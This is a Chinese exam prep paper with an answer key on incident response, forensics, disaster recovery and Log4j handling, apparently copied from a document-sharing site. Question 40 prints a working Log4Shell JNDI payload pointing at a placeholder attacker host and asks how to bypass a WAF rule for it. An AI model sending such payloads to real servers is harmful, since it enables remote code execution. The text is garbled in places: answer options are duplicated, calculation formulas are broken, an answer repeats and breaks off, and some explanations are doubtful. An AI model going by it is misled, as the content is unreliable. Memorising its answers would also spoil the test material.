版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
2026年网络安全应急响应与恢复考试冲刺卷一、单项选择题(每题2分,共20分)1.在应急响应六阶段模型中,"遏制"阶段的首要目标是A.彻底根除攻击者B.防止事件影响扩散C.收集完整证据链D.恢复业务至RTO以内答案:B解析:遏制阶段强调快速隔离受影响资产,阻断横向移动路径,避免事件蔓延。2.某企业采用NISTSP800-61r2流程,当事件级别从"高"升级为"严重"时,必须立即触发的动作是A.关闭所有外网出口B.启动危机沟通小组C.强制下线生产数据库D.向监管部门递交书面报告答案:B解析:NIST模型要求严重事件必须在15分钟内通知高层并启动危机沟通。3.在Windows取证中,可用来定位"最近访问的压缩包"的最可靠工件是A.$MFTB.Amcache.hveC.SRUM数据库D.ShellBags答案:D解析:ShellBags记录资源管理器文件夹浏览状态,包含压缩包路径及访问时间。4.关于日志完整性保护,下列算法组合能提供"前向完整性"的是A.HMAC-SHA256+对称密钥B.MerkleTree+可信时间戳C.BloomFilter+随机盐D.PBKDF2+AES-GCM答案:B解析:MerkleTree通过哈希链式结构确保旧日志无法被悄悄篡改,实现前向完整性。5.在Linux应急响应脚本中,可一次性提取"当前已建立TCP连接、进程PID及命令行"的命令是A.`lsof-iTCP-sTCP:ESTABLISHED-n-P`B.`netstat-tulnp|grepESTABLISHED`C.`ss-tunpstateestablished'(dport=:orsport=:)'`C.`ss-tunpstateestablished'(dport=:orsport=:)'`D.`ls-l/proc//fd/2>/dev/null|grepsocket`D.`ls-l/proc//fd/2>/dev/null|grepsocket`答案:C解析:ss命令支持状态过滤且输出字段含PID,适合脚本化批量采集。6.当发生勒索软件加密事件时,以下做法最符合"最低权限还原"原则的是A.直接使用域管账户全网推送重装脚本B.仅对确认干净的备份介质挂载只读快照C.先解密部分文件确认可用性再全网恢复D.临时提升所有用户本地管理员权限答案:B解析:只读快照避免备份被二次加密,同时不额外扩大权限面。7.在制定灾难恢复策略时,RPO为15分钟意味着A.数据丢失量不能超过15分钟B.系统停机时间不能超过15分钟C.备用网络带宽需≥15MbpsD.演练频率不得低于每15个月一次答案:A解析:RPO(RecoveryPointObjective)衡量可接受的数据丢失窗口。8.使用Volatility分析内存镜像时,为定位"隐藏内核模块"应优先使用的插件是A.pslistB.modulesC.modscanD.callbacks答案:C解析:modscan通过扫描内核池可发现被unlink的隐藏模块。9.以下关于云原生应急响应的描述,错误的是A.需通过Kubernetesauditlog追踪API对象变更B.容器运行时威胁优先使用eBPF探针采集C.公有云IAM密钥泄露事件可直接关闭租户账号D.镜像投毒检测可结合Cosign与in-totoattestation答案:C解析:关闭租户账号属于极端措施,需遵循云服务商合规流程,不可直接操作。10.当应急指挥系统进入"疲劳期"时,最有效的干预措施是A.立即更换全部技术人员B.引入红队实施二次攻击C.启动轮班制与认知负荷管理D.降低事件优先级至"低"答案:C解析:轮班与认知负荷管理可缓解长时间高压导致的决策质量下降。二、多项选择题(每题3分,共15分,多选少选均不得分)11.以下哪些指标可用于量化"应急响应团队成熟度"A.MTTD(平均检测时间)B.MTTR(平均恢复时间)C.漏洞扫描覆盖率D.事件复盘关闭率E.钓鱼邮件点击率答案:A、B、D解析:C、E偏向预防与培训维度,不直接反映响应成熟度。12.在工业控制系统(ICS)应急响应中,必须单独隔离的数据流有A.工程师站对PLC的组态流量B.操作员站HMI实时数据C.安全仪表系统SIS逻辑D.企业ERP办公流量E.控制器固件升级包答案:A、C、E解析:组态、SIS与固件升级直接影响物理安全,需与办公网物理隔离。13.以下关于"零信任架构下应急取证"的说法正确的有A.所有微分段流量必须解密镜像B.持续身份验证日志需保存至WORM存储C.服务网格sidecar代理会增大内存镜像体积D.动态策略变更无需留存快照E.加密隧道中的取证需依赖endpointagent答案:B、C、E解析:A错误,零信任不强制解密;D错误,策略快照是合规要求。14.在威胁狩猎假设"攻击者使用Living-off-the-Land脚本"时,可重点筛查的Windows事件ID包括A.4688(进程创建)B.4104(PowerShell脚本块)C.7045(服务安装)D.4624(账户登录)E.15(DNS客户端事件)答案:A、B、C解析:LOLBins常通过脚本块与服务安装实现无文件落地。15.当发生BGP劫持事件时,可快速验证的公开数据源有A.RIPERISB.RouteViewsC.Censys证书日志D.BGPStreamAlertE.WHOIS历史快照答案:A、B、D解析:C、E不实时反映路由宣告变化。三、判断题(每题1分,共10分,正确打"√",错误打"×")16.根据ISO/IEC27035,事件分类一旦确定不可再调整。答案:×解析:随着调查深入,可动态调整分类与优先级。17.在Linux系统中,/proc/sys/kernel/core_pattern文件若被改写,可能导致后渗透持久化。答案:√解析:攻击者可把coredump指向恶意脚本实现自启动。18.使用ChaosEngineering进行应急演练时,必须提前通知所有客户。答案:×解析:仅需通知内部干系人,避免真实客户体验受损。19.内存取证无法获取经过硬件加密的BitLocker密钥。答案:×解析:若系统已解锁,密钥仍驻留内存,可通过memorydump提取。20.在DevSecOps流水线中,"可观测性"三大支柱仅指日志、指标、追踪。答案:√解析:由CNCF定义,暂未扩展至第四支柱。21.对于容器逃逸事件,重启容器即可完全清除攻击者。答案:×解析:若宿主机内核被植入rootkit,重启容器无效。22.根据GDPR第33条,个人数据泄露需在72小时内向监管机构报告。答案:√解析:自发现之时起算,72小时为硬性要求。23.在威胁情报共享中,使用STIX2.1格式可以标注TTP的killchain阶段。答案:√解析:STIX2.1的attack-pattern对象支持kill-chain-phases属性。24.采用"蓝绿部署"可天然规避所有勒索软件风险。答案:×解析:蓝绿仅缩短切换时间,对数据面勒索无效。25.应急演练后必须进行"红队视角"复盘才能输出改进项。答案:×解析:复盘视角多元,非必须红队。四、填空题(每空2分,共20分)26.在MITREATT&CK矩阵中,"T1543.003"表示________持久化技术。答案:Windows服务27.NISTSP800-53r5中,控制族"IR"代表________。答案:IncidentResponse28.当使用Suricata进行流量检测时,规则关键字"flowbits:isset,http.login"的作用是________。答案:检查是否已设置登录状态标记,实现多规则状态关联29.在Kubernetes中,通过配置________策略可禁止容器以特权模式运行。答案:PodSecurityPolicy或PodSecurityStandards(任一即可)30.若需验证某ELF可执行是否被UPX加壳,可执行命令`upx-________file.bin`。答案:t31.Windows日志取证中,事件ID________表示计划任务创建。答案:469832.当MySQL数据库被勒索软件加密后,优先检查________文件以确认最后事务位置。答案:binlog(或二进制日志)33.在BGP安全扩展中,RPKI的英文全称是________。答案:ResourcePublicKeyInfrastructure34.使用Snortinline模式时,通过________参数启用Drops动作。答案:-Q35.根据《网络安全法》,关键信息基础设施运营者采购网络产品或服务可能影响国家安全的,应通过________审查。答案:国家安全五、简答题(每题10分,共30分)36.描述"钻石模型"在入侵调查中的四个核心元素及其关联关系,并给出一条可观测的示例链路。答案与解析:四个核心元素为Adversary(攻击者)、Infrastructure(基础设施)、Capability(能力)、Victim(受害者)。它们构成钻石四顶点,边表示关联。示例链路:攻击者使用CobaltStrikeBeacon(Capability)控制位于00的VPS(Infrastructure),通过HTTPS回连到内网财务服务器(Victim),该服务器被植入名为svchost.exe的后门(Adversaryartifact)。通过同时分析四元素,可快速定位同一攻击者控制的其他VPS,实现widercontainment。37.说明"双活数据中心"与"主备模式"在应急恢复中的优劣,并给出选择策略。答案与解析:双活优势:RPO≈0、RTO低,负载均衡提升资源利用率;劣势:架构复杂、脑裂风险高、成本翻倍。主备优势:技术成熟、运维简单、成本低;劣势:备用端平时闲置,切换RTO高。选择策略:交易型、支付类业务对RPO/RTO要求极高,应选双活;内部OA、报表系统可接受30分钟级RTO,采用主备即可。决策需综合业务影响分析(BIA)结果与成本收益比。38.概述"日志伪造(LogForgery)"攻击原理,并提出三条防御措施。答案与解析:原理:攻击者在注入点(如HTTP头、表单字段)插入换行符与伪造日志行,导致后续日志解析器误识别为多条真实事件,掩盖攻击痕迹或生成误报。防御:1.输入过滤:对写入日志的字符实施白名单,剔除\r\n等控制符;2.结构化日志:采用JSON或protobuf,避免自由文本拼接;3.签名与WORM:对日志流实时签名并写入一次写存储,防止事后伪造。六、综合计算与案例题(共30分)39.(本题15分)某电商平台在"618"大促前进行勒索软件压力测试演练。已知:全站商品图片总量500GB,平均每日新增2GB;数据库binlog每5分钟生成一个文件,平均大小50MB;备份存储采用增量合并策略,每日凌晨02:00触发,持续30分钟;网络出口带宽1Gbps,可临时升级至2Gbps;业务要求RPO≤10分钟,RTO≤30分钟。问题:(1)计算并论证现有策略能否满足RPO。(2)若binlog文件被勒索软件加密,需从备份点恢复,请给出最短恢复时间估算公式,并代入数值。(3)提出两项改进措施,使RPO≤5分钟且RTO≤15分钟,给出关键技术与成本权衡。答案与解析:(1)RPO取决于binlog备份间隔。当前每5分钟生成一个binlog,若实时同步至异地,则理论RPO=5分钟<10分钟,满足要求。(2)恢复时间=传输时间+重放时间。传输时间T1:T重放时间T2:binlog总量=50MB×(24×60/5)=14.4GB,重放速度按惯例约100MB/s,T总RTO≈70.8分钟,远超30分钟要求。(3)改进:a)采用持续数据保护(CDP)技术,将binlog实时流式复制到对象存储,RPO降至秒级;b)预置容器化热备集群,通过蓝绿切换,RTO降至5分钟。成本:CDP增加约20%存储开销与流量费;热备集群需双倍计算资源,但可降级为Spot实例节省30%成本。40.(本题15分)阅读以下模拟流量片段,回答问题。给定一条HTTP请求:```POST/api/resetpassHTTP/1.1Host:portal.exampleX-Forwarded-For:8Content-Type:application/jsonContent-Length:67{"user":"admin","timestamp":1695123456,"reset_code":"${jndi:ldap://attacker/a}"}```(1)指出该请求利用的漏洞名称与编号(给出MITRECWE)。(2)假设WAF规则采用正则`/\$\{jndi:/i`进行拦截,为何仍可能被绕过?给出两种绕过示例。(3)作为应急人员,已发现多台内网服务器出现类似请求,请列出"遏制—取证—根除—恢复"四阶段的关键命令或工具(每阶段至少一条)。答案与解析:(1)Log4j2JNDI注入,CWE-502(反序列化不受信任数据)。(2)绕过示例:a)嵌套大小写`JNDI:ldap://...`,默认正则不区分大小写但仅匹配小写(3)遏制:在边界防火墙封禁attacker地址`iptables-AOUTPUT-dattacker-jDROP`;取证:对受影响主机`sudotcpdump-iany-wlog4j.pcaphostattacker`抓包;根除:升级Log4j至2.17.1并删除JndiLookup类`zip-q-dlog4j-core-.jarorg/apache/logging/log4j/core/lookup/JndiLookup.class`;恢复:重启Java服务并验证补丁`java-jarlog4j-patch-tester.jar`。(3)遏制:在边界防火墙封禁attacker地址`iptables-AOUTPUT-dattacker-jDROP`;取证:对受影响主机`sudo
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 诊疗安全防护方案承诺函9篇
- 城市绿肺生态保护承诺书范文5篇
- 合作单位技术合作保障承诺书8篇范文
- 明确质量责任保证承诺书范文4篇
- 志愿行动诚信履约承诺书6篇范文
- 智能设备可靠功能承诺书(9篇)
- 2026幼儿园自我体验能力课件
- 资产管理防止遗漏承诺书(8篇)
- 通信运营商网络服务质量提升策略研究
- 售后服务问题反馈与处理指南模板
- 建筑施工安全培训全套课件
- 《大学生心理健康教育》课件第8章
- 不良事件管理办法香港
- 乡村振兴背景下农村教育发展路径研究
- 2025年福建省初中学业水平考试中考(会考)生物试卷(真题+答案)
- 小学英语三年级家长会课件
- 广西幼师学前专业儿童文学课件第8章 儿童诗
- 国家能源集团陆上风电项目通 用造价指标(2024年)
- 项目工程检测培训
- 儿童哲学论-高振宇著
- TOPCon 电池无银化进展-蒋秀林
评论
0/150
提交评论